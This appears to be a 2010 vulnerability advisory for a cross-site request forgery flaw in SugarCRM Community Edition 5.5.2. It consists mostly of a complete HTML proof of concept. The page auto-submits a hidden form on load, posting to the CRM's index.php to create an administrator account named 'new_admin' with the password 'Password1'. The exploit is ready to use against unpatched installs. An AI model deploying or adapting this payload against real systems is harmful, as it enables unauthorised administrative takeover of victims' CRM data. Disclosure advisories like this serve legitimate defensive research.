<!--=========================================================================================================# # _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ # # /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ # # ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) # # /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ # # \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ # # )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ # # \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ # # # #============================================================================================================# # # # Vulnerability............Cross-site Request Forgery # # Software.................SugarCRM Community Edition 5.5.2 # # Download.................http://www.sugarcrm.com/crm/download/sugar-suite.html # # Date.....................5/30/10 # # # #============================================================================================================# # # # Site.....................http://cross-site-scripting.blogspot.com/ # # Email....................john.leitch5@gmail.com # # # #============================================================================================================# # # # ##Description## # # # # A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create # # a new admin. # # # # # # ##Proof of Concept## # # --> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://192.168.1.4/sugarcrm/index.php"> <input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&display_tabs[]=Dashboard&display_tabs[]=Calendar&display_tabs[]=Activities&display_tabs[]=Leads&display_tabs[]=Contacts&display_tabs[]=Accounts&display_tabs[]=Opportunities&display_tabs[]=Emails&display_tabs[]=Campaigns&display_tabs[]=Cases&display_tabs[]=Documents&" /> <input type="hidden" name="hide_tabs_def" value="" /> <input type="hidden" name="remove_tabs_def" value="" /> <input type="hidden" name="module" value="Users" /> <input type="hidden" name="record" value="" /> <input type="hidden" name="action" value="Save" /> <input type="hidden" name="page" value="EditView" /> <input type="hidden" name="return_module" value="Users" /> <input type="hidden" name="return_id" value="" /> <input type="hidden" name="return_action" value="DetailView" /> <input type="hidden" name="password_change" value="true" /> <input type="hidden" name="required_password" value="1" /> <input type="hidden" name="user_name" value="" /> <input type="hidden" name="type" value="" /> <input type="hidden" name="is_group" value="0" /> <input type="hidden" name="portal_only" value="" /> <input type="hidden" name="is_admin" value="1" /> <input type="hidden" name="is_current_admin" value="1" /> <input type="hidden" name="required_email_address" value="0" /> <input type="hidden" name="sugar_user_name" value="new_admin" /> <input type="hidden" name="unique_name" value="" /> <input type="hidden" name="first_name" value="" /> <input type="hidden" name="status" value="Active" /> <input type="hidden" name="last_name" value="a" /> <input type="hidden" name="UserType" value="Administrator" /> <input type="hidden" name="old_password" value="" /> <input type="hidden" name="new_password" value="Password1" /> <input type="hidden" name="confirm_new_password" value="Password1" /> <input type="hidden" name="emailAddressWidget" value="1" /> <input type="hidden" name="emailAddress0" value="" /> <input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" /> <input type="hidden" name="emailAddressVerifiedFlag0" value="true" /> <input type="hidden" name="emailAddressVerifiedValue0" value="" /> <input type="hidden" name="useEmailWidget" value="true" /> <input type="hidden" name="email_link_type" value="sugar" /> <input type="hidden" name="mail_smtpuser" value="" /> <input type="hidden" name="mail_smtppass" value="" /> <input type="hidden" name="employee_status" value="Active" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="phone_work" value="" /> <input type="hidden" name="department" value="" /> <input type="hidden" name="phone_mobile" value="" /> <input type="hidden" name="reports_to_name" value="" /> <input type="hidden" name="reports_to_id" value="" /> <input type="hidden" name="phone_other" value="" /> <input type="hidden" name="phone_fax" value="" /> <input type="hidden" name="phone_home" value="" /> <input type="hidden" name="messenger_type" value="" /> <input type="hidden" name="messenger_id" value="" /> <input type="hidden" name="address_street" value="" /> <input type="hidden" name="address_city" value="" /> <input type="hidden" name="address_state" value="" /> <input type="hidden" name="address_postalcode" value="" /> <input type="hidden" name="address_country" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="receive_notifications" value="12" /> <input type="hidden" name="export_delimiter" value="," /> <input type="hidden" name="mailmerge_on" value="0" /> <input type="hidden" name="reminder_time" value="60" /> <input type="hidden" name="default_export_charset" value="ISO-8859-1" /> <input type="hidden" name="user_max_tabs" value="12" /> <input type="hidden" name="user_max_subtabs" value="12" /> <input type="hidden" name="user_subpanel_tabs" value="on" /> <input type="hidden" name="dateformat" value="m/d/Y" /> <input type="hidden" name="currency" value="-99" /> <input type="hidden" name="timeformat" value="H:i" /> <input type="hidden" name="default_currency_significant_digits" value="2" /> <input type="hidden" name="timezone" value="Africa/Abidjan" /> <input type="hidden" name="ut" value="0" /> <input type="hidden" name="num_grp_sep" value="," /> <input type="hidden" name="default_locale_name_format" value="s f l" /> <input type="hidden" name="dec_sep" value="." /> <input type="hidden" name="calendar_publish_key" value="" /> <input type="hidden" name="outboundtest_from_address" value="" /> </form> </body> </html>